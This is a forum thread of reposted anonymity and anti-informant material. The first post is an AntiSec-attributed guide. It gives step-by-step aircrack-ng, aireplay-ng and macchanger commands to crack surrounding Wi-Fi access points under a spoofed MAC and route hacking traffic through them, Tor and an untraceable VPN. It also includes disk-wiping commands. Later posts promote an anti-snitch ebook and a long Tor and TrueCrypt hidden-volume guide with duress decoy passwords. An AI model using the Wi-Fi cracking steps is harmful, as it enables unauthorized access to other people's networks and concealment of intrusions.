Who's A Rat - Largest Online Database of Informants and Agents
HomeMembers LoginLatest NewsRefer A LawyerMessage BoardOnline StoreAffiliatesAbout UsContact Us
Who's A Rat - Largest Online Database of Informants and Agents Worldwide!
Site Navigation
Visit Our Store
Refer A Lawyer
Affiliates
Link To Us
Latest News
Top Secret Documents
Make A Donation
Important Case Law
Members Login
Feedback
Message Board
Legal Information
Advertise your AD, Book or Movie

Informants and Agents?Who's a Rat Message Board

WhosaRat.com
Sign up Calendar
 
 
 


Reply
  Author   Comment  
hannah

Registered:
Posts: 797
Reply with quote  #1 

Want to stay safe online?

 http://www.facebook.com/notes/lulzsec/want-to-be-a-ghost-on-the-internet/230293097062823

By @AntiSecOp

 

Required files:VMWare Workstation:

 

http://www.demonoid.me/files/details/2787488/008172892720/Windows 7 Ultimate: http://www.demonoid.me/files/details/2811393/003064834770/BackTrack 5 R1 VMWare: http://www.backtrack-linux.org/ajax/download_redirect.php?id=BT5R1-GNOME-VM-32.7zpfsense: http://files.chi.pfsense.org/mirror/downloads/pfSense-2.0.1-RELEASE-amd64.iso.gzUbuntu Live CD: http://www.ubuntu.com/start-download?distro=desktop&bits=32&release=latest

 

 

Required Hardware:

Virtualization supported CPU

4GB RAM

USB wifi adapter supporting packet injection:http://www.amazon.com/Alfa-802-11b-Wireless-Original-9dBi/dp/B001O9X9EU/ref=sr_1_2?ie=UTF8&qid=1328768355&sr=8-2

 

 

VPN Account without paper trail

  • Purchase prepaid visa card with cash
  • Purchase Bitcoins with Money Order
  • Donate Bitcoins to different account
  • Purchase VPN account with bitcoins

 

 

VPN ServicesoVPN.to

 

 

 

Step One

  • Enable Boot and Setup page BIOS password
  • Turn computer on, press key to enter Setup. Usually F1, F2, F11, Del, something similar. Then go to the Security tab

 

 

Step Two

  • Boot Ubuntu LiveCD to cleanly wipe hard drive
  • After booting LiveCD, open up terminal and type sudo "fdisk -l" to get a list of disks and partitions
  • Use the wipe command on each partition that is listed with the above commandie "sudo wipe /dev/sda1"
  • Repeat for each drive (sdb, sdc) and each partition (sda1, sda2)
  • Reboot

 

 

Step Three

  • Install Windows 7 Ultimate and shred free space
  • Boot from Windows disk and install
  • After clean install, install fileshredder http://www.fileshredder.org
  • Run fileshredder using "Secure Erasing Algorithm with 7 passes"Reboot
  • Enable BitLocker drive encryption. Safe key to USB stick
  • Reboot
  • Run Windows Update
  • Turn off Swap space (Control Panel > System and Security > Advanced > Performance > Disable Virtual Memory
  • Reboot

 

 

Step Four

Install VMWare  

 

 

Step Five

  • BackTrack 5 R1 Virtual Machine to be used for cracking WiFi
  • Open VMWare and import the BackTrack 5 R1 VMWare image (link above)
  • Set VM to 256MB RAM
  • Create a Network Adapter (VMNet0)
  • Directly attach USB wifi adapter (VM > Removable Devices > Check Wireless Adapter)
  • Bridge eth0 to wlan0

 

Easy Mode method:

  • apt-get -y install network-manager
  • rm /etc/network/interfaces
  • reboot
  • Open Network Manager
  • eth0 IPv4 Settings > Method > Shared to other computers

 

  • Use aircrack-ng to crack surrounding AP's
  • airmon-ng stop wlan0
  • ifconfig wlan0 down
  • macchanger --mac 00:11:22:33:44:55 wlan0
  • airmon-ng start wlan0
  • airodump-ng wlan0
  • Get SSID and channel for next step
  • airodump-ng -c (channel #) -w (file name) --bssid (bssid) wlan0
  • Let this sit until you have plenty of data points
  • aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
  • Look for successful ACK
  • aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  • Also let this run for a while, look for 10k ACK's aircrack-ng -b (bssid) (file name-01.cap)
  • Connect to SSID

 

 

Step Six

  • Pfsense install to use VPN
  • 8 GB of Hard Drive space
  • 256MB RAM
  • Two Network Adapters (VMnet0 and VMnet1)
  • After installing from the downloaded ISO, set WAN to VMnet0 and LAN to VMnet1. You should get a WAN dhcp IP from VM#1
  • Assign LAN IP and enable DHCP (192.168.1.1/24)

 

Step Seven

  • Install TorBox to anonymize ALL traffic
  • 128MB RAM
  • 5GB Hard Drive space
  • One Network Adapter (VMnet1)
  • Follow Torproject.org instructions for TorBox https://trac.torproject.org/projects/tor/wiki/doc/TorBOX
  • Open a browser and go to http://192.168.1.1
  • Login to pfsense with admin/pfsense and change password, force https, and enable all logging
  • Go to PPTP VPN Tab and input info from VPN info above

 

 

Step Eight

  • BackTrack 5 R1 VM for all cracking/penetration testing/everything
  • Import another BT5 vmware image
  • 512MB RAM
  • One Network Adapter (VMnet1)
  • Set default Gateway to match the IP of your previous VM (TorBox)
  • ALL data will now travel securely (BT5 > Tor Network > Over VPN > Internet using cracked wifi)
  • Download Tor Bundle from torproject.org
  • Use FireFox Portable bunlded with Tor Bundle (more secure)
  • All exploiting/penetration testing, cracking, etc is done on this VM

 

 

Step Nine

Encrypt All VM's

Open settings for Each VM in VMWare

Under Options > Enable Encryption

Set secure password

 


__________________
Test your connection for leaks:
http://ip-check.info/?lang=en

Use TAILS
https://tails.boum.org/

How to boot from USB and other great stuff:
http://www.rmprepusb.com/

Open pdf and word files online instead of on your puter'
http://view.samurajdata.se/

USE the net more securely:
https://pressfreedomfoundation.org/blog/2014/04/help-support-little-known-privacy-tool-has-been-critical-journalists-reporting-nsa
https://www.torproject.org/download/download

http://www.theintelligencenews.com/


"The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes......"



"There's a war out there, old friend. A world war. And it's not about who's got the most bullets. It's about who controls the information.... it's all about the information!"
0
hannah

Registered:
Posts: 797
Reply with quote  #2 
 
Downloads

Download now by clicking a format in the left column.

These days, law enforcement at all levels -- from the local cop shop to obscure federal agencies -- uses snitches to trap ordinary people. Snitches tell lies that send their friends to jail. Paid agents provocateurs talk or trick otherwise harmless people into committing crimes. In many places, Snitch culture has virtually replaced real investigation of real crimes.

Don't think you're exempt if you're a "law-abiding citizen." The most trusting, naive, innocent people often make the easiest targets for these weaselly, lying, opportunistic vermin. Snitches specialize in targeting the vulnerable.

You may be in danger if you are:

  • A political activist
  • A recreational drug user
  • A hobbyist or business person who works with "sensitive" materials
  • A member of an unpopular religion
  • A gun owner or dealer
  • A participant in the underground economy
  • A photographer or videographer
  • A controversial thinker or writer
  • Or you just happen to hang out with the wrong people

Snitches are everywhere and they're hard to detect. This brief, FREE ebook, Rats, can help you:

  • Identify a snitch
  • Protect yourself against snitches and agents provocateurs
  • Protect your friends or colleagues
  • Know how to handle yourself if you get arrested

It could even help you avoid being pressured into becoming a snitch, yourself.

Rats is the work of ex-cops, lawyers, security experts, experienced activists, outlaws, former outlaws, trained interrogators, and more. In the hour or so it takes you to read their information, you'll gain a lifetime's worth of armor against snitches, informers, informants, agents provocateurs, narcs, finks, and similar vermin.

Download the Rats ebook now. Five electronic formats. All absolutely FREE. Download below or top of page left.

Share it with your friends. Spread it around. Offer copies for download you your own site or mirror this entire page. All we ask is that you provide a link back to http://rats-nosnitch.com/. Information is power -- the power of free people against a growing police state.

If you want to read the book in one of the ereader formats but don't own a Kindle or a Nook, you can download free reader software for phones, Windows and Mac computers, and other devices. Free Kindle apps from Amazon.com. Free Nook apps from Barnes & Noble.

Downloads
file:///data/RatsBook/www/download_button_pdf.png

Rats! Your guide to protecting yourself
against snitches, informers, informants,
agents provocateurs, narcs, finks,
and similar vermin

By Claire Wolfe
with the Commentariat of the Living Freedom blog




Rats is issued under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License. You may make copies and distribute them for any non-commercial purpose, as long as you keep the original attribution. You may not alter the text in any way, and you may not distribute the book commercially

__________________
Test your connection for leaks:
http://ip-check.info/?lang=en

Use TAILS
https://tails.boum.org/

How to boot from USB and other great stuff:
http://www.rmprepusb.com/

Open pdf and word files online instead of on your puter'
http://view.samurajdata.se/

USE the net more securely:
https://pressfreedomfoundation.org/blog/2014/04/help-support-little-known-privacy-tool-has-been-critical-journalists-reporting-nsa
https://www.torproject.org/download/download

http://www.theintelligencenews.com/


"The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes......"



"There's a war out there, old friend. A world war. And it's not about who's got the most bullets. It's about who controls the information.... it's all about the information!"
0
hannah

Registered:
Posts: 797
Reply with quote  #3 

How to secure your computer and surf fully Anonymous BLACK-HAT STYLE
http://security23.wordpress.com/2011/11/25/how-to-secure-your-computer-and-surf-fully-anonymous-black-hat-style/
November 25, 2011 by SECURITY23

From cyberguerrilla.info (relocated links) This is a guide with which even a total noob can get high class security for his system and complete anonymity online. But its not only for noobs, it contains a lot of tips most people will find pretty helpfull. It is explained so detailed even the biggest noobs can do it^^ :
=== The Ultimate Guide for Anonymous and Secure Internet Usage v1.0.1 ===

Table of Contents:

Obtaining Tor Browser
Using and Testing Tor Browser for the first time
Securing Your Hard Drive
Setting up TrueCrypt, Encrypted Hidden Volumes
Testing TrueCrypt Volumes
Securing your Hard Disk
Temporarily Securing Your Disk, Shredding Free Space
Installing VirtualBox
Installing a Firewall
Firewall Configuration
Installing Ubuntu
Ubuntu Initial Setup
Installing Guest Additions
Installing IRC (Optional)
Installing Torchat (Optional)
Creating TOR-Only Internet Environment
General Daily Usage

By the time you are finished reading and implementing this guide, you will be able to securely and anonymously browse any website and to do so anonymously. No one not even your ISP or a government agent will be able to see what you are doing online. If privacy and anonymity is important to you, then you owe it to yourself to follow the instructions that are presented here.

In order to prepare this guide for you, I have used a computer that is running Windows Vista. This guide will work equally well for other versions of Windows. If you use a different operating system, you may need to have someone fluent in that operating system guide you through this process. However, most parts of the process are easily duplicated in other operating systems.

I have written this guide to be as newbie friendly as possible. Every step is fully detailed and explained. I have tried to keep instructions explicit as possible. This way, so long as you patiently follow each step, you will be just fine.

In this guide from time to time you will be instructed to go to certain URLs to download files. You do NOT need TOR to get these files, and using TOR (while possible) will make these downloads very slow.

This guide may appear overwhelming. Every single step is explained thoroughly and it is just a matter of following along until you are done. Once you are finished, you will have a very secure setup and it will be well worth the effort. Even though the guide appears huge, this whole process should take at the most a few hours. You can finish it in phases over the course of several days.

It is highly recommended that you close *ALL* applications running on your computer before starting.

Links not working? Try here.

http://pastebin.com/sp6YAvGb

__________________
Test your connection for leaks:
http://ip-check.info/?lang=en

Use TAILS
https://tails.boum.org/

How to boot from USB and other great stuff:
http://www.rmprepusb.com/

Open pdf and word files online instead of on your puter'
http://view.samurajdata.se/

USE the net more securely:
https://pressfreedomfoundation.org/blog/2014/04/help-support-little-known-privacy-tool-has-been-critical-journalists-reporting-nsa
https://www.torproject.org/download/download

http://www.theintelligencenews.com/


"The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes......"



"There's a war out there, old friend. A world war. And it's not about who's got the most bullets. It's about who controls the information.... it's all about the information!"
0
hannah

Registered:
Posts: 797
Reply with quote  #4 

The danger of metadata [digital footprints]
http://security23.wordpress.com/2012/04/06/the-danger-of-metadata-digital-footprints/
April 6, 2012 by SECURITY23

What is metadata?

To put it bluntly, metadata is hidden data that can fuck you over. Fuck you over real hard and rough like, savvy?

Often defined as “data about data,” metadata is information about a specific file that’s often included within the file itself but that’s often not readily visible or modifiable to the end-user when z is viewing the file in the standard application that z would typically use to view the file.

In other words, metadata provides background information about a file. Chances are that every document you create, every digital photograph you take, every music file you download, and so on, all have little bits of metadata which can leak vital information about your identity.

Read the entire article at CyberGuerrilla.org

http://www.cyberguerrilla.info/blog/?p=5316

__________________
Test your connection for leaks:
http://ip-check.info/?lang=en

Use TAILS
https://tails.boum.org/

How to boot from USB and other great stuff:
http://www.rmprepusb.com/

Open pdf and word files online instead of on your puter'
http://view.samurajdata.se/

USE the net more securely:
https://pressfreedomfoundation.org/blog/2014/04/help-support-little-known-privacy-tool-has-been-critical-journalists-reporting-nsa
https://www.torproject.org/download/download

http://www.theintelligencenews.com/


"The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes......"



"There's a war out there, old friend. A world war. And it's not about who's got the most bullets. It's about who controls the information.... it's all about the information!"
0
hannah

Registered:
Posts: 797
Reply with quote  #5 
here is the full guide in case it gets taken down



0-How to secure your computer and surf fully #anonymous BLACK-HAT STYLE


This is a guide with which even a total noob can get high class security for his system and complete anonymity online. But its not only for noobs, it contains a lot of tips most people will find pretty helpfull. It is explained so detailed even the biggest noobs can do it^^ :

=== The Ultimate Guide for Anonymous and Secure Internet Usage v1.0.1 ===

Table of Contents:

1. Obtaining Tor Browser
2. Using and Testing Tor Browser for the first time
3. Securing Your Hard Drive
4. Setting up TrueCrypt, Encrypted Hidden Volumes
5. Testing TrueCrypt Volumes
6. Securing your Hard Disk
7. Temporarily Securing Your Disk, Shredding Free Space
8. Installing VirtualBox
9. Installing a Firewall
10. Firewall Configuration
11. Installing Ubuntu
12. Ubuntu Initial Setup
13. Installing Guest Additions
14. Installing IRC (Optional)
15. Installing Torchat (Optional)
16. Creating TOR-Only Internet Environment
17. General Daily Usage

By the time you are finished reading and implementing this guide, you will be able to securely and anonymously browse any website and to do so anonymously. No one not even your ISP or a government agent will be able to see what you are doing online. If privacy and anonymity is important to you, then you owe it to yourself to follow the instructions that are presented here.

In order to prepare this guide for you, I have used a computer that is running Windows Vista. This guide will work equally well for other versions of Windows. If you use a different operating system, you may need to have someone fluent in that operating system guide you through this process. However, most parts of the process are easily duplicated in other operating systems.

I have written this guide to be as newbie friendly as possible. Every step is fully detailed and explained. I have tried to keep instructions explicit as possible. This way, so long as you patiently follow each step, you will be just fine.

In this guide from time to time you will be instructed to go to certain URLs to download files. You do NOT need TOR to get these files, and using TOR (while possible) will make these downloads very slow.

This guide may appear overwhelming. Every single step is explained thoroughly and it is just a matter of following along until you are done. Once you are finished, you will have a very secure setup and it will be well worth the effort. Even though the guide appears huge, this whole process should take at the most a few hours. You can finish it in phases over the course of several days.

It is highly recommended that you close *ALL* applications running on your computer before starting.

Next:1 : Obtaining Tor Browser

=== 1 : Obtaining Tor Browser ===

The first step to becoming secure and anonymous online is to setup and install something called "TOR". "TOR" is short for "The Onion Router". The concepts behind TOR were first implemented by the United States Military, and these principles have been used to create an extremely secure mechanism for being anonymous online. In fact, millions of people world-wide use TOR to browse the internet and communicate anonymously.

TOR works by heavily encrypting your communications so that no observer can see what website you are really going to, and what information is really being sent. It all appears as a bunch of random characters to any observer. You simply use the TOR web browser just as you use any other web browser. TOR takes care of the rest.

However, TOR by itself is not enough. Even when using TOR, a user can be compromised in a number of ways. First, some websites can be set up to attempt to reveal someone's true IP address (their true identity) by tricking their web browser or other software to transmitting that information. For this reason, anyone who uses TOR will recommend that no one have javascript or flash turned on while browsing TOR. In this guide however, I will show you a much better solution.

The second issue is that of human error. Even if you have TOR installed, you may accidentally forget which browser to put in a link. You may also accidentally click on a link from another program, such as a chat program. That program might then load the link you clicked on into a non-TOR browser. When you are using TOR, you must be careful *constantly* that every link goes into the right browser, and that you do not accidentally click the wrong link.

So then, let's begin. Obtaining the TOR Browser is easy. Simply go to the following website:

http://www.torproject.org

Once here, you may feel free to read more about what TOR is and how it works, or you may proceed to immediately download TOR.

Here is how to do so:

1. Click on "Download TOR", or "Download".

2. You will see text that says, "The Tor Browser Bundle contains everything you ned ... Just extract it and run. Learn more >>

3. Click on this "Learn more" link. for the "Tor Browser Bundle"

4. Assuming you are an English speaker, you would choose the top-most link "English (en-US)". Otherwise, pick the language best suited to you.

5. The file being saved will be named: tor-browser-1.3.18_en-US.exe

It is ok if the number is not exactly 1.3.18, there are new versions of Tor from time to time. At the time that this guidewas written, 1.3.18 was most current. By the time you are reading this, a more current version of TOR may exist.

6. Run this file.

7. You will be prompted to extract this to a directory. By default, it will be set to C:UsersYouDownloads This is perfectly ok. You can also choose a different directory if you wish.

8. Click "Extract"

That's it. TOR Browser is NOW installed. Time to test it out!

Next 2 : Using and Testing Tor Browser for the first time ===






















=== 2 : Using and Testing Tor Browser for the first time ===

Now you have successfully downloaded and installed the Tor Web Browser Bundle. You are no doubt anxious to begin using it. First, click on the "start" menu icon, the icon in the lower left of your screen with the windows logo. On the top right will be a listing that says "You", "Documents", "Pictures", "Music"... "You" of course will be replaced by your user name. Click on "You", the top most link. This will open up your main user folder.

Now, locate the folder called "Downloads" and double click on it.

Now, inside the "Downloads" folder, double click on the folder called "Tor Browser".

Lastly, double click on the application: "Start Tor Browser"

When you do, you will see the Vidalia Control Panel appear, and you will observe as you connect to the TOR network. When this is complete, your web browser will open up and will automatically connect to the web address: check.torproject.org

This is to confirm that you are in fact using TOR. If you have followed this guide correctly, then you will see the following green text, or something similar:

"Congratulations. Your browser is configured to use Tor."

Now you can use this web browser the same as any other. You can go to any website you wish, and neither your ISP or anyone else will be able to see where you are going, or what you are doing. However, there are still issues that need to be resolved, so don't begin browsing just yet.

*************************************
***** IMPORTANT SAFETY NOTE *****
*************************************
If you fill out a form containing your email address, your name, or any other sensitive information while using the TOR browser, be aware that sometimes it is possible for an observer to see that information. When using TOR, use it to access websites and content that you are *not* connected to via your real identity or any username or nick name which links to your real identity. Let TOR be for anonymous browsing solely. Do your online banking, or any other activities involving your real identity using your normal web browser.
************************************

Next: 3 : Securing Your Hard Drive ===








=== 3 : Securing Your Hard Drive ===

Being able to browse anonymously is one thing. However, you may choose to download and save sensitive content or material to your computer which you wish to keep private. This may include reading sensitive documents, viewing pictures, or storing any kind of sensitive data.

If you save *anything* to your computer's harddrive, then it is possible for someone who has confiscated your computer to determine what it was you saved. This is often true even if you delete the content. For example, suppose I use the Tor Browser and I navigate to a website containing a sensitive document that I wish to read. If I saved that document somewhere on my harddrive, then it is possible for someone else to find it. If I *delete* that document, it may still be possible for someone to undelete it.

Further, even if I never save it to my harddrive but I simply look at it using my word processing software, it may still be saved in a number of ways including:

1. Often programs keep records of filenames. The filename alone is often enough to incriminate someone.

2. Often programs keep parts of the content viewed saved for various reasons, such as for searching. This can include random excerpts of text, thumbnails of images, and more. Often this "partial" data is more than enough to prove what the original data was. Often the "partial" data is itself incriminating.

3. Sometimes, especially if you are running low on system memory, your operating system may choose to use your hard-disk as a temporary RAM. This is known as "SWAP". Normally, whenever you turn off your computer, whatever was in RAM is deleted. However, the data that goes to your SWAP may persist and it may be possible for someone to see what content you had open in your programs if that information is saved in RAM.

Generally speaking, you *must* have a plan to secure any content that is saved to your hard disk. Therefore, this guide would be incomplete if we did not thoroughly address this. First, there are two kinds of such content:

1. Deliberately saved content.
2. Inadvertently saved content.

Deliberately saved content refers to content that you have chosen to save on your harddisk so that you can access this content later. We will
address how to do this later in the guide.

Inadvertently saved content refers to content that is saved by programs you use, or your operating system. You have no way to even know what this content might be. Therefore, this is the most dangerous. You may browse and find a dozen sensitive documents, utterly delete them, and some program may have saved the file names and excerpts of the data. This will render your previous efforts futile.

Content that is inadvertently saved to your harddisk comes in two flavors:

1. Content that is saved to your SWAP space.

2. Content that is saved by applications running on your computer, including your operating system.

The surest way to prevent content from writing to your SWAP space is to disable your SWAP space altogether. This may result in your computer
running a bit slower than normal, and may mean that you cannot use ram intensive games and applications during the time your SWAP is disabled.

Therefore, if you use this method, simply turn back on the SWAP when you want to use those ram intensive applications. Also, you may choose not
to take this step.


1 - Here is how to disable your swap space if you are using Windows 7:

*** ADVANCED INSTRUCTIONS BELOW. SKIP THIS IF YOU ARE NOVICE OR UNCOMFORTABLE WITH THIS OPERATION ***

*This step is recommended for advanced users only. If you are not comfortable doing this, you may safely skip this step.*

Instructions are less verbose than usual, as these steps are intended for advanced users only. If you do not fully understand these instructions, skip this step.

1. From Control Panel, go to "System and Security".

2. Click on "System", and then choose "Advanced system settings" in the left-most menu.

3. Under the "Advanced" tab, under "Performance", click "Settings".

4. Under this "Advanced" tab, under "Virtual Memory", click "Change".

5. Uncheck "Automatically manage paging file sizes for all drives".

6. Select "No paging file".

7. Save, reboot, and follow these same first 5 steps to confirm that "No paging file" is still selected. This means that you have successfully disabled your swap. This means that *nothing* from RAM will be inadvertently saved to your harddrive.

To resume using SWAP again, simply click "Automatically manage paging file size for all drives." You can switch between these two modes as you desire.

Generally speaking, your computer will run fine without a swap file, provided you have enough RAM.

*** END OF ADVANCED INSTRUCTIONS ***

The next issue we need to address is how to prevent applications and/or your operating system from saving content inadvertently that you do not want
saved. For this, we are going to set up a "Virtual Machine".

A "Virtual Machine" is like a computer inside of your computer. Everything you do inside the Virtual Machine (vm for short) will be fully contained within
itself and no one will be able to see what the vm has been doing. Ideally, you want *ALL* of your sensitive computer usage of any kind, TOR or NON TOR, to take place within a vm. In this way, you can keep everything private that you wish while still using your computer fully and getting the most out of it.

Don't be afraid of this sounds complicated. This guide will take you through every step slowly and methodically. Before we can set up a vm however, we need to take another step.

Next: 4 : Setting up TrueCrypt, Encrypted Hidden Volumes ===



























=== 4 : Setting up TrueCrypt, Encrypted Hidden Volumes ===

If you save anything on your computer, it is likely that you do not want just anyone to be able to see what you have saved. You want a way to protect that
information so that you can access it, and absolutely no one else except those you trust. Therefore, it makes sense to set up a system which protects your information and safeguards it against prying eyes.

The best such system for this is called "True Crypt". "True Crypt" is an encryption software program which allows you to store many files and directories inside of a single file on your harddrive. Further, this file is encrypted and no one can actually see what you have saved there unless they know your password.

This sounds extremely high tech, but it is actually very easy to set up. We are going to do so, right now:

1. Go to http://www.truecrypt.org/downloads (or go to http://www.truecrypt.org, and click on "Downloads")
2. Under "Latest Stable Version", under "Windows 7/Vista/XP/2000", click "Download"
3. The file will be called "True Crypt Setup 7.0a.exe" or something similar. Run this file.
4. If prompted that a program needs your permission to continue, click "Continue".
5. Check "I accept and agree to be bound by these license terms"
6. Click "Accept"
7. Ensure that "Install" is selected, and click "Next"
8. click "Install"
9. You will see a dialog stating "TrueCrypt has been successfully installed." Click "Ok"
10. Click "No" when asked if you wish to view the tutorial/user's guide.
11. Click "Finish"

At this point, TrueCrypt is now installed. Now we will set up truecrypt so that we can begin using it to store sensitive information.

1. Click the "Windows Logo"/"Start" button on the lower left corner of your screen.
2. Click "All Programs"
3. Click "TrueCrypt"
4. Click the "TrueCrypt" application

And now we can begin:

1. click the button "Create Volume"
2. Ensuring that "Create an encrypted file container" is selected, click "Next"
3. Select "Hidden TrueCrypt volume" and click "Next".
4. Ensuring that "Normal mode" is selected, click "Next"
5. Click on "Select File"

Note which directory you are in on your computer. Look at the top of the dialog that has opened and you will see the path you are in, most likely the home directory for your username. An input box is provided with a flashing cursor asking you to type in a file name. Here, you will type in the following filename:

random.txt

You may of course replace random.txt with anything you like. This file is going to be created and will be used to store many other files inside.
Do NOT use a filename for a file that already exists. The idea here is that you are creating an entirely new file.

It is also recommended though not required that you "hide" this file somewhere less obvious. If it is in your home directory, then someone who has
access to your computer may find it easier. You can also choose to put this file on any other media, it doesn't have to be your hard disk. You could for example save your truecrypt file to a usb flash drive, an sd card, or some other media. It is up to you.

6. Once you have typed in the file name, click "Save"
7. Make sure "Never save history" is checked.
8. Click "Next"
9. On the "Outer Volume" screen, click "Next" again.
10. The default Encryption Algorithm and Hash Algorithm are fine. Click "Next"
11. Choose a file size.

In order to benefit the most from this guide, you should have at least 10 gigabytes of free disk space. If not, then it is worth it for you to purchase
some form of media (such as a removable harddrive, a large sd card, etc.) in order to proceed. TrueCrypt can be used on all forms of digital media not just your hard disk. If you choose to proceed without obtaining at least ten gigabytes of disk space, then select a size that you are comfortable with
(such as 100 MB).

Ideally, you want to choose enough space to work with. I recommend 20 GB at least. Remember that if you do need more space later, you can always create additional TrueCrypt volumes using exactly these same steps.

12. Now you are prompted for a password. THIS IS VERY IMPORTANT. READ THIS CAREFULLY

*** READ THIS SECTION CAREFULLY ***

*** The password you choose here is a decoy password. That means, this is the password you would give to someone under duress. Suppose that someone suspects *** that you were accessing sensitive information and they threaten to beat you or worse if you do not reveal the password. THIS is the password that you *** give to them. When you give someone this password, it will be nearly impossible for them to prove that it is not the RIGHT password. Further, they cannot *** even know that there is a second password.

Here are some tips for your password:

A. Choose a password you will NEVER forget. It may be ten years from now that you need it. Make it simple, like your birthday repeated three times.
B. Make sure it seems reasonable, that it appears to be a real password. If the password is something stupid like "123" then they may not believe you.
C. Remember that this is a password that you would give to someone if forced. It is *NOT* your actual password.
D. Do not make this password too similar to what you plan to really use. You do not want someone to guess your main password from this one.

And with all of this in mind, choose your password. When you have typed it in twice, click "Next".

13. "Large Files", here you are asked whether or not you plan to store files larger than 4 GIGABYTES. Choose "No" and click "Next"
14. "Outer Volume Format", here you will notice some random numbers and letters next to where it says "Random Pool". Go ahead and move your mouse around for a bit. This will increase the randomness and give you better encryption. After about ten seconds of this, click "Format".
15. Depending on the file size you selected, it will take some time to finish formatting.

"What is happening?"

TrueCrypt is creating the file you asked it to, such as "random.txt". It is building a file system contained entirely within that one file. This file system can be used to store files, directories, and more. Further, it is encrypting this file system in such a way that without the right password it will be impossible for anyone to access it. To *anyone* other than you, this file will appear to be just a mess of random characters. No one will even know that
it is a truecrypt volume.

16. "Outer Volume Contents", click on the button called, "Open Outer Volume"

An empty folder has opened up. This is empty because you have yet to put any files into your truecrypt volume.

*** *** DO NOT PUT ANY SENSITIVE CONTENT HERE *** ***

This is the "Decoy". This is what someone would see if you gave them the password you used in the previous step. This is NOT where you are going to store your sensitive data. If you have been forced into a situation where you had to reveal your password to some individual, then that individual will see whatever is in this folder. You need to have data in this folder that appears to be sensitive enough to be protected by truecrypt in order to fool them. Here are some important tips to keep in mind:

A. Do NOT use porn. Adult models can sometimes appear to be underaged, and this can cause you to incriminate yourself unintentionally.
B. Do NOT use drawings/renderings /writings of porn. In many jurisdictions, these are just as illegal as photographs.
C. Good choices for what to put here include: backups of documents, emails, financial documents, etc.
D. Once you have placed files into this folder, *NEVER* place any more files in the future. Doing so may damage your hidden content.

Generally, you want to store innocent data where some individual looking at it would find no cause against you, and yet at the same time they would understand why you used TrueCrypt to secure that data.

Now, go ahead and find files and store them in this folder. Be sure that you leave at least ten gigabytes free. The more the better.

When you are all done copying files into this folder, close the folder by clicking the "x" in the top right corner.

17. click "Next"

18. If prompted that "A program needs your permission to continue", click "Continue"
19. "Hidden Volume", click "Next"
20. The default encryption and hash algorithms are fine, click "Next"
21. "Hidden Volume Size", the maximum available space is indicated in bold below the text box. Round down to the nearest full unit. For example, if 19.97 GB is available, select 19 GB. If 12.0 GB are available, select 11 GB.
22. If a warning dialog comes up, asking "Are you sure you wish to continue", select "Yes"
23. "Hidden Volume Password"

*** IMPORTANT READ THIS ***

Here you are going to select the REAL password. This is the password you will NEVER reveal to ANYONE else under any circumstances. Only you will know it. No one will be able to figure it out or even know that there is a second password. Be aware that an individual intent on obtaining your sensitive information may lie to you and claim to be able to figure this out. They cannot.

It is HIGHLY recommended that you choose a 64 character password here. If it is difficult to remember a 64 character password, choose an 8 character password and simply repeat it 8 times. A date naturally has exactly 8 numbers, and a significant date in your life repeated 8 times would do just fine.

24. Type in your password twice, and click "Next"
25. "Large Files", select "Yes" and click "Next".
26. "Hidden Volume Format", as before move your mouse around for about ten seconds randomly, and tehn click "Format".
27. If prompted "A program needs your permission to continue", select "Continue"
28. A dialog will come up telling you that the hidden TrueCrypt volume has been successfully created. Click "Ok"
29. Click "Exit"

Congratulations! You have just set up an encrypted file container on your hard drive. Anything you store here will be inaccessible to anyone except you. Further, you have protected this content with TWO passwords. One that you will give to someone under threat, and one that only you will know. Keep your real password well protected and never write it down or give it to anyone else for any reason.

Now, we should test BOTH passwords.

Next:5. Testing TrueCrypt Volumes ===












=== 5. Testing TrueCrypt Volumes ===

Once you have completed the above section, you will be back at TrueCrypt. Go ahead and follow these steps to test the volumes you have made.

1. Click "Select File..."
2. Locate the file you created in the last section, most likely called "random.txt" or something similar. Remember that even though there is both an outer and
a hidden volume, both volumes are contained in a single file. There are not two files, only one.
3. Click "Open"
4. Choose a drive letter that you are not using (anything past M is probably just fine). Click on that, For example click on "O:" to highlight it.
5. Click "Mount"
6. Now you are prompted for a password. Read the below carefully:

The password you provide here will determine WHICH volume is mounted to the drive letter you specified. If you type in your decoy password, then O: will show all the files and directories you copied that you would reveal if forced. If you type in your real password, then O: will show the files and directories that you never intend anyone to see.

7. After successfully typing in your password, you will see additional detail to the right of the drive letter, including the full path to the file you selected
as well as the kind of volume it is (for example, hidden).
8. Right click on your "Windows Logo"/"Start Menu" icon, and scroll down to the bottom where you can see your different drive letters. You will see the drive letter you selected, for example: "Local Disk (O:)". Click on that.
9. If you selected your decoy password, you will see all the files and folders that you moved there during the installation phase. If you selected the real password, you will see whatever files and directories you have placed so far into the hidden volume, if any.

If you selected your hidden volume password, you may now begin moving any sensitive information you wish. Be aware that simply moving it from your main hard disk is not enough. We will discuss how to ensure deleted data is actually deleted later in the guide.

"What is happening?"

When you select a file and mount it to a drive, you are telling your computer that you have a new drive with files and folders on it. It is the same thing as if
you had plugged in a usb flash drive, a removable harddrive, or an sd card into your computer. TrueCrypt causes your computer to think that there is an
entirely new disk drive on your computer. You can use this disk drive just as if it *was* actually a usb flash drive. You can copy files to it, directories, and use it just as you would use a usb flash drive.

When you are done, simply close all open windows/folders/applications that are using your truecrypt drive letter, and then click "Dismount" from within TrueCrypt while you have the drive letter highlighted. This will once again hide all of this data, accessible only by re-mounting it with the correct password.

*** VERY IMPORTANT SAFETY INFORMATION ***

When a true crypt hidden volume is mounted, someone who has access to your computer can access anything that is inside that hidden volume. If for example you left your computer running while a truecrypt volume was mounted, then if someone gained access to your computer they would be able to see everything you have in that volume. Therefore:

*** ALWAYS REMEMBER TO DISMOUNT ANY TRUECRYPT VOLUME CONTAINING ANY SENSITIVE INFORMATION WHEN YOU ARE NOT USING YOUR COMPUTER ***

You can tell that it is dismounted because the drive letter inside of "TrueCrypt"'s control panel will appear the same as all of the other drive letters, with no information to the right of the drive letter.

You should practice Mounting and Dismounting a few times with both passwords to make sure you understand this process.

